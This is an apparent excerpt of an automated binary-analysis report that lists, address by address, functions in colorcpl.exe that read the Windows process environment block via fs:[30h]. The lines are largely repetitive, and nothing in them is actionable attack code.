            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26812349 mov eax, dword ptr fs:[00000030h]2_2_26812349
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2686634F mov eax, dword ptr fs:[00000030h]2_2_2686634F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26838350 mov ecx, dword ptr fs:[00000030h]2_2_26838350
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2685A352 mov eax, dword ptr fs:[00000030h]2_2_2685A352
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov ecx, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681035C mov eax, dword ptr fs:[00000030h]2_2_2681035C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788397 mov eax, dword ptr fs:[00000030h]2_2_26788397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788397 mov eax, dword ptr fs:[00000030h]2_2_26788397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788397 mov eax, dword ptr fs:[00000030h]2_2_26788397
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E388 mov eax, dword ptr fs:[00000030h]2_2_2678E388
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E388 mov eax, dword ptr fs:[00000030h]2_2_2678E388
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678E388 mov eax, dword ptr fs:[00000030h]2_2_2678E388
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B438F mov eax, dword ptr fs:[00000030h]2_2_267B438F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267B438F mov eax, dword ptr fs:[00000030h]2_2_267B438F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683437C mov eax, dword ptr fs:[00000030h]2_2_2683437C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BC073 mov eax, dword ptr fs:[00000030h]2_2_267BC073
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792050 mov eax, dword ptr fs:[00000030h]2_2_26792050
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268280A8 mov eax, dword ptr fs:[00000030h]2_2_268280A8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268560B8 mov eax, dword ptr fs:[00000030h]2_2_268560B8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268560B8 mov ecx, dword ptr fs:[00000030h]2_2_268560B8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A020 mov eax, dword ptr fs:[00000030h]2_2_2678A020
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C020 mov eax, dword ptr fs:[00000030h]2_2_2678C020
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268120DE mov eax, dword ptr fs:[00000030h]2_2_268120DE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268160E0 mov eax, dword ptr fs:[00000030h]2_2_268160E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE016 mov eax, dword ptr fs:[00000030h]2_2_267AE016
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814000 mov ecx, dword ptr fs:[00000030h]2_2_26814000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832000 mov eax, dword ptr fs:[00000030h]2_2_26832000
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C0F0 mov eax, dword ptr fs:[00000030h]2_2_2678C0F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D20F0 mov ecx, dword ptr fs:[00000030h]2_2_267D20F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267980E9 mov eax, dword ptr fs:[00000030h]2_2_267980E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A0E3 mov ecx, dword ptr fs:[00000030h]2_2_2678A0E3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826030 mov eax, dword ptr fs:[00000030h]2_2_26826030
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26816050 mov eax, dword ptr fs:[00000030h]2_2_26816050
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267880A0 mov eax, dword ptr fs:[00000030h]2_2_267880A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679208A mov eax, dword ptr fs:[00000030h]2_2_2679208A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834180 mov eax, dword ptr fs:[00000030h]2_2_26834180
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834180 mov eax, dword ptr fs:[00000030h]2_2_26834180
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684C188 mov eax, dword ptr fs:[00000030h]2_2_2684C188
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2684C188 mov eax, dword ptr fs:[00000030h]2_2_2684C188
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681019F mov eax, dword ptr fs:[00000030h]2_2_2681019F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681019F mov eax, dword ptr fs:[00000030h]2_2_2681019F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681019F mov eax, dword ptr fs:[00000030h]2_2_2681019F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681019F mov eax, dword ptr fs:[00000030h]2_2_2681019F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796154 mov eax, dword ptr fs:[00000030h]2_2_26796154
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796154 mov eax, dword ptr fs:[00000030h]2_2_26796154
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678C156 mov eax, dword ptr fs:[00000030h]2_2_2678C156
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268561C3 mov eax, dword ptr fs:[00000030h]2_2_268561C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268561C3 mov eax, dword ptr fs:[00000030h]2_2_268561C3
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E1D0 mov eax, dword ptr fs:[00000030h]2_2_2680E1D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E1D0 mov eax, dword ptr fs:[00000030h]2_2_2680E1D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E1D0 mov ecx, dword ptr fs:[00000030h]2_2_2680E1D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E1D0 mov eax, dword ptr fs:[00000030h]2_2_2680E1D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E1D0 mov eax, dword ptr fs:[00000030h]2_2_2680E1D0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C0124 mov eax, dword ptr fs:[00000030h]2_2_267C0124
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268661E5 mov eax, dword ptr fs:[00000030h]2_2_268661E5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C01F8 mov eax, dword ptr fs:[00000030h]2_2_267C01F8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov eax, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov ecx, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov eax, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov eax, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov ecx, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov eax, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov eax, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov ecx, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov eax, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683E10E mov ecx, dword ptr fs:[00000030h]2_2_2683E10E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26850115 mov eax, dword ptr fs:[00000030h]2_2_26850115
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683A118 mov ecx, dword ptr fs:[00000030h]2_2_2683A118
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683A118 mov eax, dword ptr fs:[00000030h]2_2_2683A118
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683A118 mov eax, dword ptr fs:[00000030h]2_2_2683A118
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2683A118 mov eax, dword ptr fs:[00000030h]2_2_2683A118
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26824144 mov eax, dword ptr fs:[00000030h]2_2_26824144
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26824144 mov eax, dword ptr fs:[00000030h]2_2_26824144
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26824144 mov ecx, dword ptr fs:[00000030h]2_2_26824144
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26824144 mov eax, dword ptr fs:[00000030h]2_2_26824144
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26824144 mov eax, dword ptr fs:[00000030h]2_2_26824144
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26828158 mov eax, dword ptr fs:[00000030h]2_2_26828158
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864164 mov eax, dword ptr fs:[00000030h]2_2_26864164
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864164 mov eax, dword ptr fs:[00000030h]2_2_26864164
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A197 mov eax, dword ptr fs:[00000030h]2_2_2678A197
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A197 mov eax, dword ptr fs:[00000030h]2_2_2678A197
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678A197 mov eax, dword ptr fs:[00000030h]2_2_2678A197
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D0185 mov eax, dword ptr fs:[00000030h]2_2_267D0185
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796E71 mov eax, dword ptr fs:[00000030h]2_2_26796E71
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681CEA0 mov eax, dword ptr fs:[00000030h]2_2_2681CEA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681CEA0 mov eax, dword ptr fs:[00000030h]2_2_2681CEA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2681CEA0 mov eax, dword ptr fs:[00000030h]2_2_2681CEA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678EE5A mov eax, dword ptr fs:[00000030h]2_2_2678EE5A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2682AEB0 mov eax, dword ptr fs:[00000030h]2_2_2682AEB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2682AEB0 mov eax, dword ptr fs:[00000030h]2_2_2682AEB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26846ED0 mov ecx, dword ptr fs:[00000030h]2_2_26846ED0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26788E1D mov eax, dword ptr fs:[00000030h]2_2_26788E1D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov ecx, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAE00 mov eax, dword ptr fs:[00000030h]2_2_267BAE00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8EF5 mov eax, dword ptr fs:[00000030h]2_2_267C8EF5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796EE0 mov eax, dword ptr fs:[00000030h]2_2_26796EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796EE0 mov eax, dword ptr fs:[00000030h]2_2_26796EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796EE0 mov eax, dword ptr fs:[00000030h]2_2_26796EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796EE0 mov eax, dword ptr fs:[00000030h]2_2_26796EE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826E20 mov eax, dword ptr fs:[00000030h]2_2_26826E20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826E20 mov eax, dword ptr fs:[00000030h]2_2_26826E20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26826E20 mov ecx, dword ptr fs:[00000030h]2_2_26826E20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26862E4F mov eax, dword ptr fs:[00000030h]2_2_26862E4F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26862E4F mov eax, dword ptr fs:[00000030h]2_2_26862E4F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2E9C mov eax, dword ptr fs:[00000030h]2_2_267C2E9C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2E9C mov ecx, dword ptr fs:[00000030h]2_2_267C2E9C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678AE90 mov eax, dword ptr fs:[00000030h]2_2_2678AE90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678AE90 mov eax, dword ptr fs:[00000030h]2_2_2678AE90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678AE90 mov eax, dword ptr fs:[00000030h]2_2_2678AE90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810E7F mov eax, dword ptr fs:[00000030h]2_2_26810E7F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810E7F mov eax, dword ptr fs:[00000030h]2_2_26810E7F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26810E7F mov eax, dword ptr fs:[00000030h]2_2_26810E7F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAF69 mov eax, dword ptr fs:[00000030h]2_2_267BAF69
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BAF69 mov eax, dword ptr fs:[00000030h]2_2_267BAF69
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CF50 mov eax, dword ptr fs:[00000030h]2_2_2678CF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CF50 mov eax, dword ptr fs:[00000030h]2_2_2678CF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CF50 mov eax, dword ptr fs:[00000030h]2_2_2678CF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CF50 mov eax, dword ptr fs:[00000030h]2_2_2678CF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CF50 mov eax, dword ptr fs:[00000030h]2_2_2678CF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678CF50 mov eax, dword ptr fs:[00000030h]2_2_2678CF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CCF50 mov eax, dword ptr fs:[00000030h]2_2_267CCF50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267BEF28 mov eax, dword ptr fs:[00000030h]2_2_267BEF28
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864FE7 mov eax, dword ptr fs:[00000030h]2_2_26864FE7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CCF1F mov eax, dword ptr fs:[00000030h]2_2_267CCF1F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792F12 mov eax, dword ptr fs:[00000030h]2_2_26792F12
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26846FF7 mov eax, dword ptr fs:[00000030h]2_2_26846FF7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26846F00 mov eax, dword ptr fs:[00000030h]2_2_26846F00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D0FF6 mov eax, dword ptr fs:[00000030h]2_2_267D0FF6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D0FF6 mov eax, dword ptr fs:[00000030h]2_2_267D0FF6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D0FF6 mov eax, dword ptr fs:[00000030h]2_2_267D0FF6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D0FF6 mov eax, dword ptr fs:[00000030h]2_2_267D0FF6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267ACFE0 mov eax, dword ptr fs:[00000030h]2_2_267ACFE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267ACFE0 mov eax, dword ptr fs:[00000030h]2_2_267ACFE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678EFD8 mov eax, dword ptr fs:[00000030h]2_2_2678EFD8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678EFD8 mov eax, dword ptr fs:[00000030h]2_2_2678EFD8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678EFD8 mov eax, dword ptr fs:[00000030h]2_2_2678EFD8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792FC8 mov eax, dword ptr fs:[00000030h]2_2_26792FC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792FC8 mov eax, dword ptr fs:[00000030h]2_2_26792FC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792FC8 mov eax, dword ptr fs:[00000030h]2_2_26792FC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26792FC8 mov eax, dword ptr fs:[00000030h]2_2_26792FC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814F40 mov eax, dword ptr fs:[00000030h]2_2_26814F40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814F40 mov eax, dword ptr fs:[00000030h]2_2_26814F40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814F40 mov eax, dword ptr fs:[00000030h]2_2_26814F40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26814F40 mov eax, dword ptr fs:[00000030h]2_2_26814F40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26834F42 mov eax, dword ptr fs:[00000030h]2_2_26834F42
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26830F50 mov eax, dword ptr fs:[00000030h]2_2_26830F50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832F60 mov eax, dword ptr fs:[00000030h]2_2_26832F60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26832F60 mov eax, dword ptr fs:[00000030h]2_2_26832F60
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2F98 mov eax, dword ptr fs:[00000030h]2_2_267C2F98
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2F98 mov eax, dword ptr fs:[00000030h]2_2_267C2F98
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26864F68 mov eax, dword ptr fs:[00000030h]2_2_26864F68
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CCF80 mov eax, dword ptr fs:[00000030h]2_2_267CCF80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680CCA0 mov ecx, dword ptr fs:[00000030h]2_2_2680CCA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680CCA0 mov eax, dword ptr fs:[00000030h]2_2_2680CCA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680CCA0 mov eax, dword ptr fs:[00000030h]2_2_2680CCA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680CCA0 mov eax, dword ptr fs:[00000030h]2_2_2680CCA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C4C59 mov eax, dword ptr fs:[00000030h]2_2_267C4C59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679AC50 mov eax, dword ptr fs:[00000030h]2_2_2679AC50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679AC50 mov eax, dword ptr fs:[00000030h]2_2_2679AC50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679AC50 mov eax, dword ptr fs:[00000030h]2_2_2679AC50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679AC50 mov eax, dword ptr fs:[00000030h]2_2_2679AC50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679AC50 mov eax, dword ptr fs:[00000030h]2_2_2679AC50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679AC50 mov eax, dword ptr fs:[00000030h]2_2_2679AC50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796C50 mov eax, dword ptr fs:[00000030h]2_2_26796C50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796C50 mov eax, dword ptr fs:[00000030h]2_2_26796C50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26796C50 mov eax, dword ptr fs:[00000030h]2_2_26796C50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_26840CB5 mov eax, dword ptr fs:[00000030h]2_2_26840CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2678EC20 mov eax, dword ptr fs:[00000030h]2_2_2678EC20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0C00 mov eax, dword ptr fs:[00000030h]2_2_267A0C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0C00 mov eax, dword ptr fs:[00000030h]2_2_267A0C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A0C00 mov eax, dword ptr fs:[00000030h]2_2_267A0C00
